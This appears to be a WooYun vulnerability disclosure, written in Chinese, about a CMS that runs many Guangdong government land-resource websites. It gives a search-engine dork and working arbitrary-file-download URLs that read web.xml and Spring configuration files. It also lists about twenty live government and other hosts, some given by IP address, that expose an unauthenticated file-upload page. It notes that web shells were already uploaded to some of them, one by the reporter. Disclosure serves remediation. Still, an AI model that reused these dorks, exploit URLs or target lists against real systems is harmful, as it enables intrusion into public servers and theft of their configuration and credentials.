WooYun.org

google搜索找到的任意文件下载：inurl:upload/FileDownload.jsp
下载任意文件请求案例：
http://www.mzgtzy.gov.cn/cms/upload/FileDownload.jsp?id=020010040000092515&filepath=/WEB-INF/web.xml&downloadName=web.xml
通过百度搜索存在任意文件上传影响的站点：
http://www.gdlr.gov.cn/cms/weblawcase/impList.jsp (已经有人上传过jsp,不是我干的)
http://gtzyj.maoming.gov.cn/cms/weblawcase/impList.jsp
http://www.mzgtzy.gov.cn/cms/weblawcase/impList.jsp (这是我干的，请center验证后删除)
http://www.zqgtzy.gov.cn/cms/weblawcase/impList.jsp
都是mzgtzy的子域名，一个发布系统控制的。
http://fs.mzgtzy.gov.cn/cms/weblawcase/impList.jsp
http://wh.mzgtzy.gov.cn/cms/weblawcase/impList.jsp
http://xn.mzgtzy.gov.cn/cms/weblawcase/impList.jsp
http://py.mzgtzy.gov.cn/cms/weblawcase/impList.jsp
http://pl.mzgtzy.gov.cn/cms/weblawcase/impList.jsp
http://mx.mzgtzy.gov.cn/cms/weblawcase/impList.jsp
http://gl.mzgtzy.gov.cn/cms/weblawcase/impList.jsp
http://www.gdbsm.gov.cn/cms/weblawcase/impList.jsp
http://210.76.65.158/cms/weblawcase/impList.jsp
http://www.gddzxh.com/cms/weblawcase/impList.jsp
http://218.15.221.42/cms/weblawcase/impList.jsp
http://gddzxh.com/cms/weblawcase/impList.jsp
http://www.gdlric.gov.cn:8090/cms/weblawcase/impList.jsp
http://jyj.gzgtzy.gov.cn/cms/upload/FileDownload.jsp?id=025010550000000432&filepath=WEB-INF/config/applicationContexts-cms.xml&downloadName=web.xml(有任意文件下载漏洞，但是没找到上传)
http://www.hytudi.com/cms/upload/FileDownload.jsp?id=025010550000000432&filepath=WEB-INF/config/applicationContexts-cms.xml&downloadName=web.xml(有任意文件下载漏洞，但是没找到上传)
http://www.gdrsgis.org:8720/cms/weblawcase/impList.jsp
http://210.76.70.142/cms/weblawcase/impList.jsp（已经被某人上传了shell）